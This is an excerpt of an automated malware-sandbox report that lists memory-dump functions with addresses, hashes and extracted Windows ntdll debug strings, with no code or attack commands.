                              Function 004B210D Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4a0000_replace.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a0bd81cd7d61091ef07c710a33b5b7639ce3beb2f11083362372e60a029832cf
                              • Instruction ID: f7fe7049f3f04cc7bfee264286c28aeb8923f664628704317fcec986750db3b7
                              • Opcode Fuzzy Hash: a0bd81cd7d61091ef07c710a33b5b7639ce3beb2f11083362372e60a029832cf
                              • Instruction Fuzzy Hash: 6CC02B03F7850A0011143CDD38030F1F368D0830FAD0871B79E08F7012644ECC1006CC
                              Function 02EB2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                              • API String ID: 48624451-2108815105
                              • Opcode ID: ce80d041c1886705d059c2a586d6caf15eadc656c0e4ed672037fa903b6de4a1
                              • Instruction ID: 95b29a918f0d79b16d0d26a7f487efc492702dd50d227b67222e0375363fbaa5
                              • Opcode Fuzzy Hash: ce80d041c1886705d059c2a586d6caf15eadc656c0e4ed672037fa903b6de4a1
                              • Instruction Fuzzy Hash: C451E6B2A80116AFDF11DB98C8909BFF7B8BF08204750E569E96AD7641D334DE04CBE0
                              Function 02F22410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                              • API String ID: 48624451-2108815105
                              • Opcode ID: f96184d13fc0ce334c41ec88d34ddc0a36c03e7f54dbe74de048657973113609
                              • Instruction ID: 0f8809da64274bf292a4984e208d184a8d8701df5e639b108983c39b1ceecf40
                              • Opcode Fuzzy Hash: f96184d13fc0ce334c41ec88d34ddc0a36c03e7f54dbe74de048657973113609
                              • Instruction Fuzzy Hash: 7E511371A40665AFDB30CE9CC99097FB7FDAF45280B00C459FA96C7681E774EA04CB60
                              Function 02EA7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                              Download Yara Rule
                              Strings
                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02EE4725
                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 02EE4787
                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02EE4655
                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02EE46FC
                              • ExecuteOptions, xrefs: 02EE46A0
                              • Execute=1, xrefs: 02EE4713
                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02EE4742
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID:
                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                              • API String ID: 0-484625025
                              • Opcode ID: e7d626cc87985eb3fa9b1579ad8f2fa1eec93350b1b18580c06d7bfd214f14fe
                              • Instruction ID: cc62b6683116f40d1d9a7b01e61851f30c9de288cd624564d5189eccb14d5fc5
                              • Opcode Fuzzy Hash: e7d626cc87985eb3fa9b1579ad8f2fa1eec93350b1b18580c06d7bfd214f14fe
                              • Instruction Fuzzy Hash: F8511A316C02196AEF11EBA8DC65BEEB7B9EF44308F04A099E505AF1D1E771AA41CF50
                              Function 02F46940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                              • Instruction ID: 361944a3b366b76a78c2483a9d0c6a1046bf6224e7decc17683992ac6a4d5b8b
                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                              • Instruction Fuzzy Hash: 9F022671508341AFD305DF18C890A6FBBEAEFC9744F04892DFA859B264DBB1E905CB52
                              Function 02EBB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: __aulldvrm
                              • String ID: +$-$0$0
                              • API String ID: 1302938615-699404926
                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                              • Instruction ID: 5c5648c6b75dd59cf7944b3c1b1c01a9482520f66710b98833fa995790ae05d9
                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                              • Instruction Fuzzy Hash: 2A81C170E852599EDF268E68C8917FFBBB2AF4531CF18E25EEC51A7694C7348840CB50
                              Function 02F220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: %%%u$[$]:%u
                              • API String ID: 48624451-2819853543
                              • Opcode ID: 03e3ceeaf9fe344892f19edb583250feb78bba4982d998959a8482681dcaed7f
                              • Instruction ID: 6408d0bbb87427e017ebb5751b7eabdb8c16b947407fa0811a717ff820324273
                              • Opcode Fuzzy Hash: 03e3ceeaf9fe344892f19edb583250feb78bba4982d998959a8482681dcaed7f
                              • Instruction Fuzzy Hash: 58215176E00129ABEB11DE69CD44EFFB7E9EF45794F044126EE05E3200E73099058BA1
                              Function 02E9F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                              Download Yara Rule
                              Strings
                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EE02BD
                              • RTL: Re-Waiting, xrefs: 02EE031E
                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EE02E7
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID:
                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                              • API String ID: 0-2474120054
                              • Opcode ID: 5bb3644ebe6ddff7591365fc81c2528914edf469a9ec0684d27c57782885d3da
                              • Instruction ID: 86e7eb4b8f277d1bb5ef93f791adb8c2e3277556f725338ff019220e9348979c
                              • Opcode Fuzzy Hash: 5bb3644ebe6ddff7591365fc81c2528914edf469a9ec0684d27c57782885d3da
                              • Instruction Fuzzy Hash: F9E1F0306887419FDB21CF28C884B6AB7E1BF88318F149A1EF5A6DB6D1D774D844CB42
                              Function 02EABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                              Download Yara Rule
                              Strings
                              • RTL: Resource at %p, xrefs: 02EE7B8E
                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02EE7B7F
                              • RTL: Re-Waiting, xrefs: 02EE7BAC
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID:
                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                              • API String ID: 0-871070163
                              • Opcode ID: fd5034db9cfefdf9b4991afb530c380b4d444d364afeb37fb23353ec5aa47682
                              • Instruction ID: 1f110fb778728a56fd5ad4102b1de3f76cdef87874e880081b4782f5ebb0f16c
                              • Opcode Fuzzy Hash: fd5034db9cfefdf9b4991afb530c380b4d444d364afeb37fb23353ec5aa47682
                              • Instruction Fuzzy Hash: 1441E3353807029BDB20CE25CC60B6AB7E6EF94718F049A1DF95A9B680DB31F8058F91
                              Function 02EAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                              Download Yara Rule
                              APIs
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EE728C
                              Strings
                              • RTL: Resource at %p, xrefs: 02EE72A3
                              • RTL: Re-Waiting, xrefs: 02EE72C1
                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02EE7294
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                              • API String ID: 885266447-605551621
                              • Opcode ID: 7437cd6e2024a363916a4ebf816eed3625e8cfded54043c26d0106234bc9c8e8
                              • Instruction ID: ec0430bfbdbc44c04e0626e513516727d0148a738121c4109068c4999f572147
                              • Opcode Fuzzy Hash: 7437cd6e2024a363916a4ebf816eed3625e8cfded54043c26d0106234bc9c8e8
                              • Instruction Fuzzy Hash: 6941F671680202ABDB21DE24CC41B66B7A5FF58718F10A619FD5ADB240EB21F841CBD1
                              Function 02F22300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: ___swprintf_l
                              • String ID: %%%u$]:%u
                              • API String ID: 48624451-3050659472
                              • Opcode ID: daa04b19ffdd3bd0beb220a0c95908203cd9a950f0f86adc0d6d58905d1b5cda
                              • Instruction ID: 32e75eba203c24edeadb0bb41ff8eff71c49b409eb5c90cd8a98f60c5d1b4bad
                              • Opcode Fuzzy Hash: daa04b19ffdd3bd0beb220a0c95908203cd9a950f0f86adc0d6d58905d1b5cda
                              • Instruction Fuzzy Hash: 11318672A002299FDB20DE28CD40BEEB7F9EF45754F544555ED49E3240EB30AE498FA0
                              Function 02EB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: __aulldvrm
                              • String ID: +$-
                              • API String ID: 1302938615-2137968064
                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                              • Instruction ID: 134a44a8c2b4731fed37fe99f29a4dd7ce42ffe973da0a2ee607eeb0f65bc977
                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                              • Instruction Fuzzy Hash: 3591C672E802059ADF26DE69C8847FFF7A5AF84768F14E51AE855EB6C0D7308940CB14
                              Function 02E79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID:
                              • String ID: $$@
                              • API String ID: 0-1194432280
                              • Opcode ID: 52536f62fe83c64a022d221f40f72d601a7f578479f2cb8f0e98e7e6aa893d6e
                              • Instruction ID: e54edd1216d1a0e629729170791e3e6c2eb8c3bec7689062afaa2fd06f8891f3
                              • Opcode Fuzzy Hash: 52536f62fe83c64a022d221f40f72d601a7f578479f2cb8f0e98e7e6aa893d6e
                              • Instruction Fuzzy Hash: 31812B75D402699BDB35DB54CC44BEAB7B8AF08754F0091EAEA1DB7241E7309E81CFA0
                              Function 02EFCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                              Download Yara Rule
                              APIs
                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 02EFCFBD
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.3740750038.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                              • Associated: 0000000F.00000002.3740750038.0000000002F69000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002F6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 0000000F.00000002.3740750038.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_2e40000_replace.jbxd
                              Similarity
                              • API ID: CallFilterFunc@8
                              • String ID: @$@4rw@4rw
                              • API String ID: 4062629308-2979693914
                              • Opcode ID: 77c6b836be4e5e25b2c995263b3b6b31b79c99f5e39f22e87cc2cde97da1b363
                              • Instruction ID: ecef13dba71e2c967815a73dfdfb868fbf199260a973aa47891f7f2ec633a5a3
                              • Opcode Fuzzy Hash: 77c6b836be4e5e25b2c995263b3b6b31b79c99f5e39f22e87cc2cde97da1b363
                              • Instruction Fuzzy Hash: 4F41BC72980218DFDB21DFA5C840AAEFBB9FF44B44F11906AFA19DB650D734C801CB60